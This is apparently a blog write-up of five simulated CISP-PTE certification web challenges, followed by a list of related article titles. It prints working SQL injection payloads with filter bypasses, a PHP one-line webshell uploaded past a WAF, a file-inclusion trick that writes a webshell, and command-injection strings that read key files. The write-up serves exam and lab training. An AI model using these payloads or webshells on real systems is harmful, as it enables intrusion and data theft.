CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。

SQL注入

通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息

通过测试得知,该传值方式为POST方式传值,这里也可以看到返回的sql语句。
输入id=1’) and 1#,发现返回的sql语句过滤了空格。

将空格用/**/代替,值正常返回构造sql语句,查看有多少个显示位,当显示位为5时,则页面不显示数据,所以有4个显示位。

id=1')/**/order/**/by/**/5#

通过联合查询来获取显示位,发现union被过滤

id=-1')/**/union/**/select/**/1,2,3,4#


尝试双写union来绕过

id=-1')/**/ununionion/**/select/**/1,2,3,4#

利用load_file来获取flag值

id=-1')/**/ununionion/**/select/**/1,2,3,load_file('/tmp/360/key')#

文件上传

通过提示得知,需要绕过waf才能上传文件至服务器,flag在/key.php中。
先编写一句话木马,将一句话木马保存在eval.php中

<?php @eval($_POST[shell])?>

通过burp去重放去修改,尝试绕过waf。
将文件后缀名修改成pht,将文件类型修改成image/gif 添加文件头GIF89a,点击发送可以看到上传成功,利用中国蚁剑连接。
查看key.php文件

文件包含

通过url可以得知是GET传值,可以利用伪协议写入一句话木马<?php $a = fopen('./1.php','w'); fwrite($a,'<?php eval($_POST[shell])?>'); fclose($a); ?>
连接成功
得到flag

命令执行

在输入框内依次输入’$,$$,|,||,;'看哪些被过滤了
发现都没过滤,我个人喜欢用‘;’,所以下列情况则是通过‘;’来测试。
输入;find / -name "key.php"
找到key.php的路径,那么只需要通过cat去看key.php内容即可

;cat /app/key.php

cat被过滤了,那么用另外的方式去查看该文件

;grep '' /app/key.php

出来了一句话,但没有完全显示
F12查看代码,得到flag

日志分析

通过提示,我们应该重点关注IP为172.16.12.12的操作,将日志文件下载下来,具体分析。
首先筛选出IP,ctrl+f打开查找,输入IP,点击在当前文件中查找
就会得到下列的搜索结果,再将其过滤一遍,只搜索返回值为200的数据。
右键点击在此搜索结果中查找数据
搜索关键字:200
可以看到这里有个疑似是管理后台的url
在浏览器将其打开
利用爆破尝试爆破账号,密码
发现账号:admin 密码:password123页面状态码为302,可能发生跳转

尝试登录,得到flag

CISP-PTE认证实操模拟题分享相关推荐

  1. Python实操模拟题

    实操题 1.Redis数据库操作 阅读下列说明及运行结果, 打开"考生文件夹\10002"文件夹中的素材,阅读代码,在空(1)至(10)处填写正确代码,操作完成后保存素材. 该题是 ...

  2. 超干货 | 在线教育增长实操者案例分享:如何玩转教育增长模型?

    从2012年开始,中国在线教育行业的市场就整体保持着高增长的趋势.随着"校外报课"逐渐成为中国家长的刚需,成人教育机构也一同进入了K12市场.在这场愈发激烈的市场竞争中,在线教育企 ...

  3. 关于计算机语言的知识正确的是,2019微软认证考试精选模拟题及答案(1.17)

    [导语]2019微软认证考试备考正在进行中,为了方便考生及时有效的备考,那么,无忧考网为您精心整理了2019微软认证考试精选模拟题及答案(1.17),把握机会抓紧练习吧.如想获取更多2019微软认证考 ...

  4. 生产专用计算机管理上必须安装,新版《药品经营质量管理规范》即GSP认证实操问题解答200问...

    新版<药品经营质量管理规范>即GSP认证实操 问题解答200问WORD版 新版<药品经营质量管理规范>即GSP认证实操问题解答200问(仅供参考),资料为广东省,资料来源广东省 ...

  5. 1+X Web前端等级考证 | 2020 12月Web前端开发中级实操 (模拟试题第一套) 附答案

    由于经常分享失败,我上传github上了,先放上链接:https://github.com/Lydever/web-1-x.git 请礼貌,不要耍流氓哈哈,创作不易,下载的同时,请start一下,谢谢 ...

  6. 数据库运维实操优质文章分享(含Oracle、MySQL等) | 2023年3月刊

    本文为大家整理了墨天轮数据社区2023年3月发布的优质技术文章,主题涵盖Oracle.MySQL.PostgreSQL等数据库的基础安装配置操作.故障处理.性能优化等日常实践操作,以及概念梳理.常用脚 ...

  7. 数据库运维实操优质文章分享(含Oracle、MySQL等) | 2023年5月刊

    本文为大家整理了墨天轮数据社区2023年5月发布的优质技术文章,主题涵盖Oracle.MySQL.PostgreSQL等数据库的安装配置.故障处理.性能优化等日常实践操作,以及常用脚本.注意事项等总结 ...

  8. 02-【实操】神策埋点实施的全流程实操与经验分享

    大家好,我是罗文正雄 神策的第一篇为<从甲方角度,拆解神策>,后续要讲解实操经验,为提高阅读体验和连贯性,本篇文章将神策的实施,埋点流程,业务赋能实操,原本后3篇的内容,压缩到一篇来讲解, ...

  9. 如何判断微信定位服务器,如何快速找到自己的微信定位,完成实操作业?分享一下我的思路...

    看到群里有很多小伙伴都卡在了微信实操这里,直接导致后续的课程没法再进行下去. 蓝鹅,我在还没有学习到微信课程的时候就在思考公众号要怎么定位,做什么内容! 直到我终于听完了老师关于微信定位的课程后,瞎想 ...

最新文章

  1. 细说进程、应用程序域与上下文之间的关系(一)——进程的概念与作用
  2. 5 select 选择的值_表单元素之选择类型
  3. altium designer显示Analyzing GND,变得很卡
  4. 下列不属于计算机图形学的应用的是,《数字图形设计》题目与答案3
  5. 赛题解析 | 初赛赛道一:实现一个分布式统计和过滤的链路追踪
  6. getchar的利用
  7. POJ1011 Sticks
  8. (单层)感知机学习规则
  9. el-cascader获取label
  10. Nginx 与 FPM 的工作机制
  11. Exadata中最有用的功能-存储索引
  12. JavaScript --------WebS APIs学习之网页特效(动画函数封装)
  13. 计算机相关论文摘要,计算机类论文摘要
  14. 蓝牙怎么调声音大小_苹果蓝牙耳机
  15. 怎么把视频转成mp3音频,下面有四个方法
  16. 在Mac上开启AptX
  17. 使用python输出星号阵列
  18. STM32之数据采集和心率检测仪(原理图、PCB、程序源码等)超详细!!!
  19. 一站式在线医疗解决方案,即构音视频技术助建互联网医疗
  20. 干货 | Amos实操教程之中介效应检验

热门文章

  1. vc_runtimeMinimum_x64.msi 找不到的解决方法microsoft
  2. Databus for Oracle
  3. 当代最值得收藏的画家作品_当代最具收藏潜力的实力派画家——徐九龙先生经典作品...
  4. scrapy爬取途牛网站旅游数据
  5. [1] 语法课 形容词-副词-情态动词
  6. 【文档】Decawave-OP-DW1000AoA-Basics
  7. 硬件大熊原创合集(2022/04更新)
  8. 香港大学计算机系介绍,香港中文大学计算机专业介绍
  9. matlab 直流电源突变,鑫诺尔科技:直流电源案例分析及经验分享
  10. 计算机专业考网警,网络警察都要学什么专业呢?